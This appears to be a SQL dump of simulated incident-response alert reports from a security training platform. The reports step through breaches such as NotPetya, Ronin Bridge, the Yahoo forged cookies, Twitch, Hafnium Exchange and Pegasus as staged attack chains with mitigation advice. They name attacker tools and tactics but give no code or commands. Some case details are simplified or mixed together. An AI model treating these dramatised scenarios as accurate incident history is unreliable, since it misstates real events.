(479, 92, 987, 2, 'Malware Execution Insight', '### Overview\nThe NotPetya payload has been executed. This stage focuses on the understanding of the malware\'s impact on initial systems.\n\n### Details\n- **Spread Mechanism**: Utilized EternalBlue and Mimikatz to propagate.\n- **Initial Impact**: Systems experienced lockouts and data encryption.\n\n### Next Steps\nAnticipate persistence mechanisms. Strengthen endpoint security and monitor for backdoor installations. Consider isolating affected systems to prevent further spread.', '2026-01-17 03:41:59');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(480, 92, 988, 3, 'Persistence Establishment Review', '### Overview\nPersistence was established through backdoor installations, allowing attackers to maintain access.\n\n### Details\n- **Backdoor Tools**: Custom scripts and known rootkits were identified.\n- **System Vulnerabilities**: Exploited outdated software, highlighting integration challenges.\n\n### Next Steps\nPrepare for lateral movement. Strengthen network segmentation, patch legacy systems, and conduct thorough vulnerability assessments.', '2026-01-17 03:41:59'),
(481, 92, 989, 4, 'Lateral Movement Analysis', '### Overview\nThe attackers moved laterally across TNT Express\'s legacy systems, utilizing the established backdoors.\n\n### Details\n- **Targeted Systems**: Focus was on those running outdated operating systems with known vulnerabilities.\n- **Technique**: Utilized stolen credentials to escalate privileges and move within the network.\n\n### Next Steps\nPrepare for potential data exfiltration and destruction. Implement tighter access controls and monitor for signs of data manipulation or theft.', '2026-01-17 03:41:59'),
(482, 92, 990, 5, NULL, NULL, '2026-01-17 03:41:59'),
(483, 93, 991, 1, 'Analysis of Initial Phishing Vector', '### Overview\nThe initial access was achieved through a sophisticated phishing attack targeting employees with access to the Ronin Bridge infrastructure. This report delves into the methods used, including the email content and the malicious payload attached.\n\n### Email Content\nThe phishing email impersonated a known partner organization, urging the recipient to open an attachment containing malicious macros. The subject line read: \'Urgent Security Update Required\'.\n\n### Malicious Payload\nOnce the attachment was opened, it executed a script that established a foothold within the network. The script was designed to deploy further malicious payloads, which we will explore in subsequent reports.\n\n### Recommendations\n- Implement advanced email filtering solutions.\n- Conduct regular phishing awareness training for all staff.', '2026-01-17 03:42:27'),
(484, 93, 992, 2, 'Deployment of Destructive Malware', '### Overview\nFollowing the successful phishing attack, the threat actors deployed destructive malware across compromised systems. This report provides insights into the malware used and its intended effects.\n\n### Malware Identification\nThe deployed malware, identified as a variant of \'HermeticWiper\', was designed to overwrite critical system files, rendering systems inoperable and covering tracks of the initial access.\n\n### Impact\nThe malware\'s primary objective was to disrupt operations and distract security teams while the attackers established persistence elsewhere in the network.\n\n### Countermeasures\n- Regularly update endpoint protection solutions.\n- Ensure offline backups are available and tested for recovery.', '2026-01-17 03:42:27'),
(485, 93, 993, 3, 'Backdoor Installation for Persistent Access', '### Overview\nWith systems disrupted by malware, the attackers installed a backdoor to maintain persistent access. This report explores the backdoor\'s characteristics and its implications for network security.\n\n### Backdoor Details\nThe backdoor, identified as \'BLINDINGCAN\', enabled remote access and control over compromised systems. It was hidden within legitimate processes to avoid detection.\n\n### Persistence Mechanism\nThe backdoor leveraged Windows Task Scheduler to ensure it reactivated upon system reboot, maintaining attacker access indefinitely.\n\n### Mitigation\n- Regularly review scheduled tasks for anomalies.\n- Implement network segmentation to limit lateral movement.', '2026-01-17 03:42:27'),
(486, 93, 994, 4, 'Credential Dumping and Lateral Movement', '### Overview\nAfter establishing persistence, the attackers initiated credential dumping to facilitate lateral movement towards Validator Nodes. This report explores the techniques used and the implications for network security.\n\n### Credential Dumping Techniques\nAttackers used the \'Mimikatz\' tool to extract credentials from memory, targeting accounts with elevated privileges for broader access.\n\n### Lateral Movement\nWith compromised credentials, attackers moved laterally across the network to access critical Validator Nodes, essential for the subsequent cryptocurrency exfiltration.\n\n### Recommendations\n- Deploy enhanced monitoring for unusual account activity.\n- Implement strict access controls for sensitive nodes.', '2026-01-17 03:42:27'),
(487, 93, 995, 5, NULL, NULL, '2026-01-17 03:42:27'),
(488, 94, 996, 1, 'Suspected Malware Deployment in Multi-Sig Infrastructure', '### Report Overview\nFollowing the detection of a suspicious multi-sig scheme compromise in the Harmony Protocol bridge, further investigation has revealed potential indicators of destructive malware deployment. This suggests a second-stage operation by the Lazarus Group aimed at cementing their control over the compromised systems.\n\n### Key Findings\n- **Malware Type**: Initial analysis indicates the use of a custom malware variant designed to avoid typical detection methods.\n- **Objective**: The malware likely aims to overwrite critical components of the multi-sig infrastructure, ensuring persistent and hidden access.\n- **Impact**: Immediate risks include the degradation of system integrity and the potential for further unauthorized crypto transactions.\n\n### Recommendations\n- **Immediate Actions**: Initiate a comprehensive malware sweep on all nodes involved in the multi-sig process.\n- **Preventive Measures**: Enhance monitoring systems to detect unusual patterns indicative of malware activity.\n\n### Next Steps\nPrepare for potential cryptocurrency laundering attempts as the attackers seek to move compromised assets.', '2026-01-17 03:44:49'),
(489, 94, 997, 2, 'Detection of Cryptocurrency Laundering Infrastructure', '### Report Overview\nSubsequent to the destructive malware deployment, our intelligence has confirmed the presence of a laundering infrastructure used by the Lazarus Group to obfuscate the trail of stolen crypto assets from the Harmony Protocol bridge.\n\n### Key Findings\n- **Infrastructure Identification**: Traces of transactions routed through multiple mixing services and privacy-centric blockchains have been identified.\n- **Patterns Observed**: The laundering process involves small, frequent transfers to minimize detection risk and leverage of tumblers.\n- **Potential Collaborators**: Analysis suggests possible partnerships with other known cybercriminal groups to facilitate asset laundering.\n\n### Recommendations\n- **Enhanced Monitoring**: Implement blockchain analysis tools to track suspicious transactions across multiple chains.\n- **Collaboration**: Work with global financial authorities to identify and freeze assets in identified laundering channels.\n\n### Future Implications\nExpect heightened complexity in tracking the laundered funds. Continuous intelligence sharing and collaboration with international agencies will be crucial to dismantle the laundering network.', '2026-01-17 03:44:49'),
(490, 94, 998, 3, NULL, NULL, '2026-01-17 03:44:49'),
(491, 95, 999, 1, 'Deep Dive: Initial Access through Smart Contract Interaction', '### Overview\nFollowing the detection of **Suspicious Smart Contract Interaction**, further analysis reveals that the attacker leveraged a previously unknown vulnerability in the smart contract\'s interaction protocols.\n\n### Technical Details\n- **Entry Point**: The attacker accessed the smart contract via an unmonitored API call, bypassing standard authentication checks.\n- **Method**: Exploited discrepancies in function calling sequences to gain unauthorized access.\n\n### Implications\nThis incident indicates the presence of potentially multiple vulnerabilities in the contract\'s interaction layer that need immediate attention.\n\n### Next Steps\nThe team is directed to focus on the integrity of the contract\'s cryptographic components as we suspect a deeper flaw may exist, leading to the **Exploitation of Signature Verification Vulnerability**.', '2026-01-17 03:45:24'),
(492, 95, 1000, 2, 'Uncovering the Signature Verification Vulnerability', '### Overview\nThe **Exploitation of Signature Verification Vulnerability** alert stems from the attacker\'s ability to manipulate the contract\'s verification process, allowing unauthorized transaction approvals.\n\n### Technical Details\n- **Vulnerability Type**: Signature verification bypass.\n- **Exploit Method**: The attacker crafted signatures mimicking legitimate sources, leveraging a flaw in the signature validation logic to approve transactions.\n\n### Implications\nThis vulnerability poses a critical threat, as it undermines the fundamental trust model of the smart contract.\n\n### Recommendations\n- Immediate patching of the verification logic to close the bypass loophole.\n- Initiate a comprehensive review of the contract\'s cryptographic protocols.\n\n### Forward Action\nInvestigate potential **Persistent Access via Compromised Keys** to ascertain if the attacker has maintained ongoing access through compromised cryptographic keys.', '2026-01-17 03:45:24'),
(493, 95, 1001, 3, 'Assessing Persistent Access and Compromised Keys', '### Overview\nFollowing the signature verification exploit, evidence suggests the attacker has established **Persistent Access via Compromised Keys**.\n\n### Technical Details\n- **Access Method**: Utilization of private keys obtained through unknown means, possibly involving phishing or insider threats.\n- **Impact**: Continuous unauthorized access to the smart contract\'s administrative functions.\n\n### Implications\nThis persistent access allows the attacker to maintain control over the contract, posing ongoing risks of further exploitation and funds misappropriation.\n\n### Countermeasures\n- Revoke and regenerate all keys associated with the smart contract.\n- Implement enhanced monitoring of key usage patterns to detect anomalies.\n\n### Looking Ahead\nThe operation now shifts focus towards **Funds Exfiltration and Bug Bounty Offer**, analyzing the attacker\'s motives behind the unusual $10M bug bounty offer and tracing the funds\' flow post-exfiltration.', '2026-01-17 03:45:24'),
(494, 95, 1002, 4, NULL, NULL, '2026-01-17 03:45:24'),
(495, 96, 1003, 1, 'Analysis of Initial Cross-Chain Transaction Patterns', '## Context\nAfter detecting the suspicious cross-chain transaction, analysis reveals that the transaction path involved multiple blockchain networks, including Ethereum, Binance Smart Chain, and Polygon. The transaction was initiated using a newly created wallet with no prior transaction history, suggesting an attempt to obfuscate the source.\n\n## Implications\nThis transaction pattern is indicative of a probing attempt, possibly to test the security protocols of different DeFi platforms across chains before executing further actions.\n\n## Recommendations\n- Implement stricter monitoring on new wallet activities with high-value transactions.\n- Enhance cross-chain transaction auditing to identify similar patterns quickly.', '2026-01-17 03:47:32'),
(496, 96, 1004, 2, 'Technical Breakdown of Cross-Chain Exploitation', '## Context\nFollowing the initial transaction, the attacker exploited a cross-chain vulnerability that allowed unauthorized access to multiple blockchain networks. The exploitation involved manipulating smart contracts to bypass security checks.\n\n## Technical Details\nThe vulnerability leveraged was a flaw in the validation logic of cross-chain bridges, enabling the attacker to create fake transactions that appeared legitimate.\n\n## Implications\nThis exploitation highlights the critical need for comprehensive security reviews of cross-chain bridges and associated smart contracts.\n\n## Recommendations\n- Conduct immediate security audits on cross-chain bridges.\n- Develop and deploy patches to address the identified vulnerabilities.', '2026-01-17 03:47:32'),
(497, 96, 1005, 3, 'Persistence Established via Compromised Smart Contracts', '## Context\nPost-exploitation, the attacker established persistence by deploying malicious smart contracts across various networks. These contracts were designed to maintain access and facilitate further unauthorized transactions.\n\n## Analysis\nThe deployed contracts included backdoors and logic bombs that could be activated remotely, indicating advanced planning and technical sophistication.\n\n## Implications\nThis persistence mechanism could allow the attacker to maintain control over the exploited networks indefinitely, posing ongoing risks.\n\n## Recommendations\n- Identify and isolate compromised smart contracts.\n- Revoke permissions and conduct a thorough review of contract interactions.', '2026-01-17 03:47:32'),
(498, 96, 1006, 4, 'Lateral Movement Patterns Across Blockchain Networks', '## Context\nFollowing persistence establishment, the attacker executed lateral movement across blockchain networks to diversify risk and maximize reach.\n\n## Patterns Observed\nThe attacker utilized decentralized exchange (DEX) platforms to swap and transfer assets across chains, complicating traceability.\n\n## Implications\nThis movement not only aids in obfuscation but also indicates a broader strategy to test vulnerabilities in different network ecosystems.\n\n## Recommendations\n- Increase monitoring of large asset transfers between DEX platforms.\n- Collaborate with inter-chain security teams to track and respond to such movements.', '2026-01-17 03:47:32'),
(499, 96, 1007, 5, 'Unexpected Return of Funds and Initiation of Dialogue', '## Context\nIn a surprising turn, the attacker returned the exfiltrated funds, opening a dialogue to disclose vulnerabilities.\n\n## Actions Taken\nThe return was accompanied by a message outlining the exploited vulnerabilities and recommendations for strengthening security.\n\n## Implications\nThis unusual behavior suggests the attack may have been an ethical hacking attempt, intended to expose weaknesses rather than cause financial harm.\n\n## Recommendations\n- Engage with the attacker, if possible, to gain further insights into the vulnerabilities.\n- Publicly acknowledge the incident and outline measures taken to prevent future occurrences.', '2026-01-17 03:47:32'),
(500, 96, 1008, 6, NULL, NULL, '2026-01-17 03:47:32'),
(501, 97, 1009, 1, 'Analysis of Initial Access Through Router Exploitation', '# Analysis of Initial Access Through Router Exploitation\n\n## Background\nThe initial alert was triggered by the detection of an unprotected router being exploited. This indicates a potential entry point for unauthorized access into the T-Mobile network.\n\n## Vulnerability Details\n- **Router Model**: Identified as a model frequently targeted due to outdated firmware and default configurations.\n- **Exploitation Method**: Likely involved the use of known vulnerabilities to gain access.\n\n## Recommendations\n- Conduct a full audit of router configurations and firmware versions.\n- Implement immediate patching and updating protocols.\n\n## Next Steps\nPrepare for possible script execution following initial access, indicating an attempt to establish further control.', '2026-01-17 03:48:32'),
(502, 97, 1010, 2, 'Detection of Malicious Script Execution', '# Detection of Malicious Script Execution\n\n## Overview\nFollowing the initial access, a malicious script execution was identified, suggesting the attacker is attempting to gain a foothold and potentially deploy more payloads.\n\n## Script Analysis\n- **Purpose**: The script appears to be designed to modify system settings or deploy additional malware.\n- **Indicators of Compromise (IoCs)**: Files created, registry changes, and unusual process activity.\n\n## Recommendations\n- Isolate affected systems immediately to prevent further spread.\n- Perform a comprehensive malware analysis.\n\n## Next Steps\nMonitor for persistence mechanisms as the attacker may attempt to maintain access.', '2026-01-17 03:48:32'),
(503, 97, 1011, 3, 'Establishment of Persistence Mechanism', '# Establishment of Persistence Mechanism\n\n## Situation\nPersistence mechanisms have been established, suggesting the attacker is securing ongoing access to the network.\n\n## Mechanism Details\n- **Techniques Used**: Scheduled tasks, registry modifications, or backdoor installation.\n- **Impact**: Allows continued access even after system reboots.\n\n## Recommendations\n- Review scheduled tasks and registry settings for unauthorized entries.\n- Implement endpoint detection and response (EDR) tools to identify ongoing intrusions.\n\n## Next Steps\nPrepare for potential lateral movement as the attacker may seek to expand their network access.', '2026-01-17 03:48:32'),
(504, 97, 1012, 4, 'Lateral Movement Detected Across Network', '# Lateral Movement Detected Across Network\n\n## Current Situation\nThe attacker is moving laterally across the network, attempting to access critical systems and sensitive data.\n\n## Techniques Observed\n- **Methods**: Pass-the-hash, remote desktop protocol (RDP) abuse, and network share exploitation.\n- **Targets**: High-value servers and databases.\n\n## Recommendations\n- Implement network segmentation to limit lateral movement.\n- Increase monitoring of privileged accounts and network activity.\n\n## Next Steps\nPrepare for potential data exfiltration attempts, as the attacker may attempt to extract large volumes of data.', '2026-01-17 03:48:32'),
(505, 97, 1013, 5, NULL, NULL, '2026-01-17 03:48:32'),
(506, 98, 1014, 1, NULL, NULL, '2026-01-17 03:50:17'),
(507, 98, 1015, 2, 'Unveiling Forged Cookie Techniques', '### Overview\nFollowing the detection of suspicious access patterns, further analysis revealed the use of **forged cookies** as a method to bypass authentication controls. These cookies mimic valid session tokens, allowing unauthorized access to user accounts.\n\n### Technical Analysis\n- **Cookie Forging Process:** Attackers reverse-engineered Yahoo\'s cookie generation algorithm to create valid session cookies.\n- **Encryption Key Compromise:** Access to the encryption keys allowed attackers to sign cookies, making them indistinguishable from legitimate ones.\n\n### Implications\nThe use of forged cookies underscores a sophisticated understanding of Yahoo\'s authentication mechanisms, suggesting potential involvement of state-sponsored actors.\n\n### Next Steps\nMonitor for signs of persistence mechanisms as attackers establish long-term access.', '2026-01-17 03:50:17'),
(508, 98, 1016, 3, 'Persistence Mechanisms: Ensuring Long-Term Access', '### Overview\nThe detection of forged cookies has been followed by evidence of **persistence mechanisms** being activated. These mechanisms are designed to maintain access to compromised systems even after initial detection.\n\n### Techniques Identified\n- **Backdoor Installation:** Attackers have installed backdoors on Yahoo\'s servers, allowing remote access at will.\n- **Credential Harvesting:** Compromised credentials are being stored for future use, enabling continued account access.\n\n### Threat Actor Insight\nThese mechanisms suggest a methodical approach typical of state-sponsored groups, who prioritize long-term infiltration.\n\n### Next Steps\nInvestigate potential lateral movement as attackers seek to expand their access to other accounts and systems.', '2026-01-17 03:50:17'),
(509, 98, 1017, 4, 'Lateral Movement: Expanding the Reach', '### Overview\nFollowing the activation of persistence mechanisms, there is now evidence of **lateral movement** across Yahoo accounts and systems. Attackers are leveraging their foothold to access additional resources.\n\n### Tactics Observed\n- **Credential Reuse:** Using harvested credentials to access related accounts and services.\n- **Network Traversal:** Exploiting network vulnerabilities to move between systems within Yahoo\'s infrastructure.\n\n### Analysis\nThis phase indicates a concerted effort to maximize data access and exfiltration potential, likely with the aim of conducting a massive data breach.\n\n### Next Steps\nPrepare for possible data exfiltration efforts as attackers reach their objectives.', '2026-01-17 03:50:17'),
(510, 98, 1018, 5, 'Massive Data Exfiltration: The Breach Unfolds', '### Overview\nThe operation has culminated in a **massive data exfiltration** event, affecting billions of Yahoo accounts. Attackers have successfully extracted vast quantities of user data.\n\n### Methods of Exfiltration\n- **Encrypted Channel Use:** Data was transferred out using encrypted channels, minimizing detection by standard monitoring tools.\n- **Batch Processing:** Data was exfiltrated in small batches over time to evade detection thresholds.\n\n### Impact Assessment\nThe scale of this data breach is unprecedented, with implications for billions of users worldwide. The involvement of state-sponsored actors is strongly indicated.\n\n### Conclusion\nImmediate efforts should focus on containment, mitigation, and user notification, along with a comprehensive review of security protocols to prevent future incidents.', '2026-01-17 03:50:17'),
(511, 99, 1019, 1, 'Unusual Data Extraction Patterns Uncovered', '### Context\nAfter detecting unauthorized API access, further analysis revealed unusual data extraction patterns consistent with data exfiltration techniques. The Data Brokers APT group appears to be executing high-frequency API calls indicative of automated data harvesting.\n\n### Key Findings\n- **High-Frequency Requests:** Patterns indicate a spike in API requests, particularly targeting user profile endpoints.\n- **Automated Scripts:** Utilization of scripts to automate data collection, bypassing standard rate limits.\n- **Data Volume:** Approximately 700 million profiles are estimated to be targeted.\n\n### Next Steps\nMonitoring for persistence techniques such as API key rotation to sustain data extraction without interruption.', '2026-01-17 03:50:48'),
(512, 99, 1020, 2, 'Persistence Techniques via API Key Rotation', '### Context\nFollowing the discovery of unusual data extraction patterns, it has become evident that the Data Brokers APT group is employing persistence techniques to maintain access.\n\n### Key Findings\n- **API Key Rotation:** Frequent changes in API keys were observed, suggesting attempts to evade detection and rate limiting.\n- **Redundancy Mechanisms:** Backup keys and multiple accounts are utilized to ensure continuous access.\n- **Adaptive Techniques:** Rapid adaptation to API changes and security enhancements.\n\n### Next Steps\nInvestigate potential lateral movement to other data sources to expand the scope of data access.', '2026-01-17 03:50:48'),
(513, 99, 1021, 3, 'Lateral Movement to Additional Data Sources', '### Context\nIn the wake of persistent API key rotation, there is evidence that the Data Brokers APT group is expanding its reach through lateral movement to additional data sources.\n\n### Key Findings\n- **Target Expansion:** Attempts identified to access other platforms with similar data profiles, including social media and professional networking sites.\n- **Credential Reuse:** Suspected use of credentials obtained from initial LinkedIn breach to gain access to other services.\n- **Cross-Platform Threats:** The potential for cross-platform data correlation enhances the risk profile.\n\n### Next Steps\nAssess the risk of aggregated data exploitation and develop mitigation strategies.', '2026-01-17 03:50:48'),
(514, 99, 1022, 4, 'Aggregated Data Exploitation Risk Analysis', '### Context\nWith evidence of lateral movement to other platforms, the risk of aggregated data exploitation by the Data Brokers APT group is heightened.\n\n### Key Findings\n- **Data Correlation:** Aggregated data from multiple sources increases the precision of personal and professional profiling.\n- **Identity Threats:** Enhanced risk of identity theft and spear-phishing attacks.\n- **Market Manipulation:** Potential for exploiting professional data for insider trading or competitive intelligence.\n\n### Recommendations\nImplement immediate countermeasures, including improved access controls, anomaly detection systems, and cross-platform data sharing agreements to mitigate risks.', '2026-01-17 03:50:48'),
(515, 99, 1023, 5, NULL, NULL, '2026-01-17 03:50:48'),
(516, 102, 1044, 1, 'Analysis of Malicious Script Execution in API Interactions', '### Background\nAfter the initial detection of suspicious activity in the Contact Importer, our team has observed unauthorized script executions interacting with Facebook\'s APIs.\n\n### Key Findings\n- **Script Origin**: The scripts originate from multiple IP addresses, primarily located in Eastern Europe.\n- **API Calls**: The scripts are making repetitive API calls to the Contact Importer function, indicating attempts to exploit the vulnerability further.\n- **Obfuscation Techniques**: Code analysis reveals the use of obfuscation methods to conceal malicious activity.\n\n### Recommendations\n- Immediate review and patching of API endpoints to prevent further exploitation.\n- Implement rate limiting and additional verification steps for API interactions.\n\n### Next Steps\nPrepare for potential credential stuffing activities, as compromised data could be used to gain persistent access.', '2026-01-24 00:10:54'),
(517, 102, 1045, 2, 'Credential Stuffing and Persistence Tactics', '### Background\nFollowing the execution of malicious scripts, there is evidence of credential stuffing attempts aimed at maintaining persistent access to user accounts.\n\n### Key Findings\n- **Credential Sources**: Compromised credentials are being sourced from previous data breaches, indicating a coordinated effort to exploit known vulnerabilities.\n- **Automation**: The attackers are utilizing automated tools to test combinations of usernames and passwords across multiple accounts.\n- **Persistence**: Once access is gained, attackers are setting up secondary authentication methods to ensure prolonged account control.\n\n### Recommendations\n- Encourage users to enable two-factor authentication.\n- Monitor login attempts for unusual patterns indicative of automated credential stuffing.\n\n### Next Steps\nInvestigate potential lateral movement as attackers may leverage compromised accounts to gain access to additional data.', '2026-01-24 00:10:54'),
(518, 102, 1046, 3, 'Lateral Movement through Compromised Accounts', '### Background\nWith persistent access achieved, attackers are now moving laterally within Facebook\'s network using compromised accounts.\n\n### Key Findings\n- **Account Compromise**: Analysis shows coordinated efforts to access privileged accounts, potentially targeting administrative or high-profile user data.\n- **Internal Network Mapping**: Attackers are using compromised accounts to reconnoiter the internal network, searching for valuable data or vulnerable systems.\n- **Escalation Attempts**: There are signs of attempts to escalate privileges within the network environment.\n\n### Recommendations\n- Conduct a full audit of account access logs to identify unusual access patterns.\n- Implement stricter access controls for sensitive internal resources.\n\n### Next Steps\nPrepare for potential data exfiltration activities, as attackers may be positioning themselves to extract large volumes of user data.', '2026-01-24 00:10:54'),
(519, 102, 1047, 4, 'Exfiltration of User Data', '### Background\nFollowing lateral movement, there is confirmed exfiltration of user data, affecting over 533 million Facebook accounts.\n\n### Key Findings\n- **Data Volume**: Large volumes of user data have been transferred to external servers, indicating a mass exfiltration event.\n- **Data Types**: The exfiltrated data includes personal information such as phone numbers, email addresses, and other sensitive PII.\n- **Transfer Methods**: Data was exfiltrated using encrypted channels to prevent detection during transfer.\n\n### Recommendations\n- Notify affected users and advise on steps to protect their personal information.\n- Collaborate with law enforcement and cybersecurity experts to track and mitigate the impact of the breach.\n\n### Conclusion\nThe investigation has highlighted critical vulnerabilities that need immediate addressing to prevent future incidents. Continuous monitoring and enhanced security protocols are essential to safeguard user data.', '2026-01-24 00:10:54'),
(520, 102, 1048, 5, NULL, NULL, '2026-01-24 00:10:54'),
(521, 103, 1049, 1, 'Analysis of Initial Access: Unusual Traffic Patterns', '## Overview\nFollowing the detection of unusual traffic on Twitch\'s servers, an in-depth analysis was conducted to identify potential entry points. The traffic spike corresponds to a period during which multiple unauthorized IP addresses attempted to communicate with Twitch\'s backend systems.\n\n## Key Findings\n- **IP Analysis**: Several IP addresses were flagged, originating from known VPN services and anonymization networks.\n- **Entry Points**: Initial access appears to have been gained through a misconfigured API endpoint, allowing unauthorized queries.\n- **Behavioral Patterns**: The traffic engaged in high-frequency requests, consistent with automated scripts or botnet activity.\n\n## Next Steps\nMonitoring has been intensified, focusing on identifying any further unauthorized access attempts. Enhanced logging and anomaly detection mechanisms are being deployed to anticipate potential execution of malicious scripts.', '2026-01-24 00:33:47'),
(522, 103, 1050, 2, 'Execution Phase: Malicious Script Activity Detected', '## Overview\nPost-initial access, malicious scripts were activated within Twitch\'s server environment. These scripts appear to have been custom-developed for the environment, indicating a high level of expertise from the attackers.\n\n## Key Findings\n- **Script Characteristics**: The scripts executed were obfuscated, employing advanced techniques to avoid detection by standard security tools.\n- **Targeted Functions**: The scripts primarily targeted data retrieval functions, particularly those related to user and financial records.\n- **Indicators of Compromise (IoCs)**: Several new IoCs were identified, including file hashes and common command-line arguments used by the scripts.\n\n## Next Steps\nEfforts are underway to neutralize the scripts and patch the vulnerabilities exploited. Analysts are working to establish the persistence mechanisms employed by the attackers to maintain access.', '2026-01-24 00:33:47'),
(523, 103, 1051, 3, 'Persistence Mechanisms: Maintaining Unauthorized Access', '## Overview\nInvestigation into the persistence mechanisms used by the attackers revealed sophisticated strategies aimed at maintaining long-term access to critical systems.\n\n## Key Findings\n- **Backdoor Implementation**: Custom backdoors were installed on several servers, providing remote access even after reboots.\n- **Credential Dumping**: Tools were used to extract credentials, enabling the attackers to create new accounts with elevated privileges.\n- **Scheduled Tasks**: Persistent scripts were scheduled to run at regular intervals, ensuring continued access and data collection.\n\n## Next Steps\nImmediate actions include dismantling the persistence mechanisms and revising user access policies. Focus is now shifting towards identifying lateral movement attempts that may have compromised additional systems.', '2026-01-24 00:33:47'),
(524, 103, 1052, 4, 'Lateral Movement and Data Exfiltration: Comprehensive Breach Overview', '## Overview\nThe attackers successfully moved laterally across Twitch\'s network, accessing multiple systems and databases. This movement facilitated a large-scale data exfiltration.\n\n## Key Findings\n- **Compromised Systems**: Key systems, including user databases and financial records, were accessed during the lateral movement phase.\n- **Data Exfiltration**: A significant volume of data, including source code and earnings reports, was exfiltrated using encrypted channels to evade detection.\n- **Tactics, Techniques, and Procedures (TTPs)**: The use of legitimate administrative tools to blend with normal traffic was noted, making detection challenging.\n\n## Next Steps\nA comprehensive review of data loss is underway, assessing the impact on operations and user privacy. Strengthening network segmentation and data loss prevention measures are top priorities. The focus now shifts to implementing robust incident response strategies and preparing public communication plans to address potential fallout.', '2026-01-24 00:33:47'),
(525, 103, 1053, 5, NULL, NULL, '2026-01-24 00:33:47'),
(526, 104, 1054, 1, 'Investigation into Unauthorized Login Attempt', '### Summary\nFollowing the detection of an unauthorized login attempt, initial assessments indicate that threat actors may have utilized compromised credentials obtained through **phishing campaigns**. These campaigns were likely targeted at GoDaddy employees, exploiting human vulnerabilities for credential theft.\n\n### Next Steps\n- **Monitor network logs** for further unauthorized access attempts.\n- **Reset affected user credentials** and enforce stricter authentication protocols.\n- Prepare for potential **sFTP activity**, as attackers may attempt to execute data manipulation or transfer operations.', '2026-01-24 00:38:07'),
(527, 104, 1055, 2, 'Analysis of Suspicious sFTP Activity', '### Summary\nSuspicious sFTP activity has been identified, potentially linked to the earlier unauthorized login attempt. This activity suggests that attackers are attempting to execute malicious scripts or transfer sensitive data.\n\n### Observations\n- Unusual file transfer patterns were detected, indicating possible data staging for exfiltration.\n- Potential use of automated scripts to facilitate data manipulation.\n\n### Next Steps\n- **Isolate affected systems** to contain potential data breaches.\n- **Deploy security patches** to address vulnerabilities in sFTP services.\n- Prepare for possible establishment of a **persistent backdoor** by the attackers, allowing them to maintain access.', '2026-01-24 00:38:07'),
(528, 104, 1056, 3, 'Detection of Persistent Backdoor', '### Summary\nA persistent backdoor has been established by the threat actors, allowing them ongoing access to compromised systems. This backdoor is likely a result of prior suspicious sFTP activity.\n\n### Technical Details\n- Backdoor appears to be a custom-built malware, designed to evade standard detection mechanisms.\n- Command and control (C&C) communication channels identified, indicating ongoing coordination with external servers.\n\n### Next Steps\n- **Conduct a comprehensive malware analysis** to understand the backdoor\'s functionality and remove it.\n- **Enhance network monitoring** to detect unusual outbound traffic indicative of lateral movement attempts.\n- Implement **network segmentation** to limit potential lateral movement within the organization.', '2026-01-24 00:38:07'),
(529, 104, 1057, 4, 'Lateral Movement within Network Detected', '### Summary\nLateral movement has been detected within the GoDaddy network, suggesting attackers are expanding their reach across different systems. This activity is consistent with efforts to identify and access high-value assets.\n\n### Observations\n- Use of compromised credentials and exploited vulnerabilities to navigate laterally.\n- Access attempts to administrative and financial systems observed.\n\n### Next Steps\n- **Strengthen access controls** and review user privileges across the network.\n- **Deploy endpoint detection and response (EDR) solutions** to identify and mitigate lateral movement threats.\n- Prepare for potential **SSL private key theft**, as attackers may target encrypted communications for sensitive data.', '2026-01-24 00:38:07'),
(530, 104, 1058, 5, NULL, NULL, '2026-01-24 00:38:07'),
(531, 105, 1059, 1, NULL, NULL, '2026-01-24 03:32:45'),
(532, 105, 1060, 2, 'Web Shell Deployment Analysis', '### Web Shell Deployment Analysis\n\nFollowing the initial access via CVE-2021-26855, our systems have detected the deployment of a web shell, a common tactic for establishing persistence. This activity suggests the adversary is setting up a mechanism to maintain access to the compromised Exchange server.\n\n#### Key Findings:\n- **Location**: The web shell was deployed in the `/owa/auth` directory, a known vector for Hafnium operations.\n- **File Signature**: The web shell file is obfuscated, consistent with previously observed Hafnium tactics.\n- **Time of Deployment**: Occurred shortly after the initial access, indicating a pre-scripted procedure.\n\n#### Recommendations:\n- Conduct a thorough file system analysis to identify and remove unauthorized files.\n- Implement additional monitoring on the affected server for unusual activity.\n\nThe next phase of the attack may involve attempts to move laterally within the network, leveraging the established persistence.', '2026-01-24 03:32:45'),
(533, 105, 1061, 3, 'Lateral Movement Threat Assessment', '### Lateral Movement Threat Assessment\n\nWith the web shell in place, the threat actor is attempting lateral movement. This phase is critical as the adversary could potentially access sensitive data or compromise additional systems.\n\n#### Observations:\n- **Techniques Used**: The attacker appears to be using compromised credentials and leveraging Windows Management Instrumentation (WMI) for lateral movement.\n- **Targets**: Initial attempts are targeting systems within the same domain, focusing on accounts with elevated privileges.\n\n#### Indicators of Compromise (IOCs):\n- Unauthorized login attempts from the Exchange server IP to other domain systems.\n- Increased network traffic related to WMI commands.\n\n#### Mitigation Strategies:\n- Immediately isolate the affected systems to prevent further spread.\n- Reset all passwords for accounts with elevated privileges.\n- Enhance network segmentation to limit lateral movement capabilities.\n\nFurther monitoring and analysis are essential to understand the full scope of the threat and ensure comprehensive remediation.', '2026-01-24 03:32:45'),
(534, 106, 1062, 1, 'Analysis of Suspicious iMessage Activity', '### Suspicious iMessage Activity Detected\n\nFollowing the detection of suspicious iMessage activity, further analysis is required to confirm the presence of Pegasus spyware. Indicators of compromise (IOCs) should be examined, focusing on the potential entry points and the characteristics of the messages involved.\n\n#### Key Indicators:\n- Unsolicited messages from unknown contacts.\n- Messages containing links or attachments that automatically execute.\n\n#### Next Steps:\n- Initiate a detailed forensic examination of the affected devices.\n- Monitor for indicators of the FORCEDENTRY vulnerability being exploited.', '2026-01-24 03:33:29'),
(535, 106, 1063, 2, 'FORCEDENTRY Vulnerability Exploitation Analysis', '### Exploitation of FORCEDENTRY Vulnerability\n\nThe exploitation of the FORCEDENTRY vulnerability signifies a critical stage in the deployment of Pegasus spyware. This zero-click exploit allows attackers to gain execution capabilities on the target device without user interaction.\n\n#### Key Points of Exploitation:\n- Utilizes crafted PDF or GIF files sent via iMessage.\n- Bypasses traditional security measures through memory corruption techniques.\n\n#### Recommendations:\n- Patch devices with the latest security updates.\n- Continuously monitor for signs of persistence mechanisms being established on the device.', '2026-01-24 03:33:29'),
